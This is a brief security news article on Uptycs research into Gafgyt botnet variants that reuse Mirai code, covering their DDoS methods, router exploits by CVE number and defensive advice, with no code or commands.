Threat research team at the cybersecurity company Uptycs has discovered several variants of the Gafgyt Linux-based botnet malware family that borrow some codes, techniques and implementations from the infamous Mirai botnet.

First spotted in 2014, Gafgyt (also known as Bashlite) usually targets vulnerable IoT devices, such as Huawei routers, Realtek routers and ASUS devices. It also uses some of the existing exploits (CVE-2017-17215, CVE-2014-8361) to download the next stage payloads.

“Gafgyt malware variants have very similar functionality to Mirai, as a majority of the code was copied,” the researchers said.

As for the latest Gafgyt versions, they have been found to include various methods to carry out DDoS attacks: HTTP flooding, UDP flooding, TCP flooding, and the STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.

Recent Gafgyt versions also incorporate a Mirai-copied telnet bruteforce scanner, as well as the GPON exploit (CVE-2018-10561), which is used for authentication bypass in vulnerable Dasan GPON routers.

The Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using ‘wget’ command, fetches the payload,” the researchers said. “[It] gives the execution permission to payload using ‘chmod’ command, [and] executes the payload.”

“Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,” Uptycs said.

To prevent such kinds of attacks users should regularly monitor the suspicious processes, events, and network traffic spawned on the execution of any untrusted binary, and
keep systems and firmware updated with the latest releases and patches.